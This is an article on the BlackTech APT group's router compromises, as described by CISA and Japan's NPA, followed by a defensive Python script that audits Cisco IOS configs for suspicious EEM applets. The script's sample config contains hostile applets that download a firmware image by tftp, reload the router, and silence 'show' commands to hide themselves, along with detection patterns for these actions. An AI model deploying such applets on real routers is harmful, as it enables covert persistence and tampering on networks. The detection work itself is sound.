BlackTech APT Hackers Attacking Network Routers to Breach Corporate Networks
BlackTech is an APT group active since at least 2010. It has targeted government, industrial, technology, media, electronics, and telecommunications organizations, as well as entities supporting the military.
The group relies on custom malware, dual-use tools that have both legitimate and malicious uses, and living-off-the-land techniques that abuse functionality already present on a system, such as disabling logging on routers, to hide its activity.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Japan's National Police Agency (NPA) describe BlackTech modifying router firmware without detection and exploiting routers' domain-trust relationships to pivot from international subsidiaries into headquarters networks in Japan and the U.S.
BlackTech actors continue to update their tools to evade detection, and they also steal code-signing certificates to make their malware appear legitimate.
BlackTech Malware Attack
The actors are known for using custom malware payloads and remote access tools (RATs) to target victims’ operating systems.
Their custom malware supports multiple operating systems, including Windows®, Linux®, and FreeBSD® operating systems.
BlackTech actors use living off-the-land TTPs to blend in with standard operating systems and network activities, allowing them to evade detection by endpoint detection and response (EDR) products.
Their current campaign targets the international subsidiaries of U.S. and Japanese companies.
Once they gain access to subsidiaries’ internal networks, they can infiltrate from subsidiaries to headquarters’ networks.
“BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks,” reads the report.
BlackTech has compromised multiple router brands and versions, including Cisco devices and equipment from other vendors.
In the case of Cisco routers, the actors hide their presence in Embedded Event Manager (EEM) policies used in Cisco IOS to automate tasks that execute upon specified events.
CISA and the NPA shared mitigation steps for this activity. The agencies strongly recommend that network defenders monitor for unusual traffic, unauthorized downloads of bootloaders and firmware images, and unexpected reboots.
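The two router-side behaviours the article describes, EEM applets used as a hiding place and logging being switched off, along with the monitoring advice above (unauthorized image downloads, unexpected reboots), can be turned into a configuration audit. The following is an added example, not code from the article, CISA, or the NPA. The running-config it inspects is constructed for the example; the applet names, image filename, and IP addresses in it are invented and are not indicators from any real incident, and the heuristics are generic EEM-abuse checks rather than BlackTech-specific signatures.

```python
"""Audit a Cisco IOS running-config for EEM applets and disabled logging.

Added example for illustration. SAMPLE_CONFIG is constructed; every name,
filename and address in it is made up. APPROVED_APPLETS stands in for a
baseline an operator would normally pull from change control.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    applet: str     # EEM applet name, or "-" for global config lines
    detail: str


# Applets an operator has reviewed; anything else is reported (assumed baseline).
APPROVED_APPLETS = {"ntp-watchdog"}

# Applet actions worth a second look, mirroring what the advisory says to
# monitor: image/bootloader downloads, reboots, logging changes, and an
# applet that intercepts a CLI command and suppresses its output.
SUSPICIOUS_ACTIONS = [
    (re.compile(r"copy\s+(tftp|ftp|http|scp):", re.I), "high",
     "applet copies a file from the network (possible firmware/bootloader download)"),
    (re.compile(r"\breload\b", re.I), "high", "applet reloads the router"),
    (re.compile(r"\bno logging\b", re.I), "high", "applet disables logging"),
    (re.compile(r"set\s+_exit_status\s+0", re.I), "medium",
     "applet swallows a CLI command (the matched command never runs)"),
]

# Global lines to compare against the baseline; 'no logging console' can be
# benign, which is why it is only medium and should be checked against history.
GLOBAL_CHECKS = [
    (re.compile(r"^no logging\b", re.I), "medium", "logging disabled in global config"),
]

SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
logging buffered 16384
no logging console
!
event manager applet sync-check
 event timer cron cron-entry "0 3 * * *"
 action 1.0 cli command "enable"
 action 2.0 cli command "copy tftp://198.51.100.23/c2900-image.bin flash:"
 action 3.0 cli command "reload"
!
event manager applet hide-session
 event cli pattern "show (log|event manager)" sync yes
 action 1.0 set _exit_status 0
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
end
"""


def parse_applets(config: str) -> dict[str, list[str]]:
    """Group the indented lines under each 'event manager applet NAME' heading."""
    applets: dict[str, list[str]] = {}
    current = None
    for raw in config.splitlines():
        if raw.startswith("event manager applet "):
            current = raw.split()[3]
            applets[current] = []
        elif current is not None and raw.startswith(" "):
            applets[current].append(raw.strip())
        else:
            current = None  # any non-indented line ends the applet block
    return applets


def audit_config(config: str) -> list[Finding]:
    """Return findings for unapproved applets, risky actions and disabled logging."""
    findings: list[Finding] = []
    for name, body in parse_applets(config).items():
        if name not in APPROVED_APPLETS:
            findings.append(Finding("medium", name, "EEM applet not in approved baseline"))
        for line in body:
            for pattern, sev, msg in SUSPICIOUS_ACTIONS:
                if pattern.search(line):
                    findings.append(Finding(sev, name, f"{msg}: {line}"))
    for raw in config.splitlines():
        for pattern, sev, msg in GLOBAL_CHECKS:
            if pattern.match(raw):
                findings.append(Finding(sev, "-", f"{msg}: {raw}"))
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"[{f.severity:<6}] {f.applet:<14} {f.detail}")
```

Run it against the output of `show running-config` collected out of band (for example over a console server), because an applet that matches `show event manager` and sets `_exit_status 0` would hide itself from an operator running that command on the router itself. Pair the config audit with the advisory's other recommendations, such as verifying image hashes and watching for unexpected reloads in syslog, since a modified firmware image does not show up in the running-config at all.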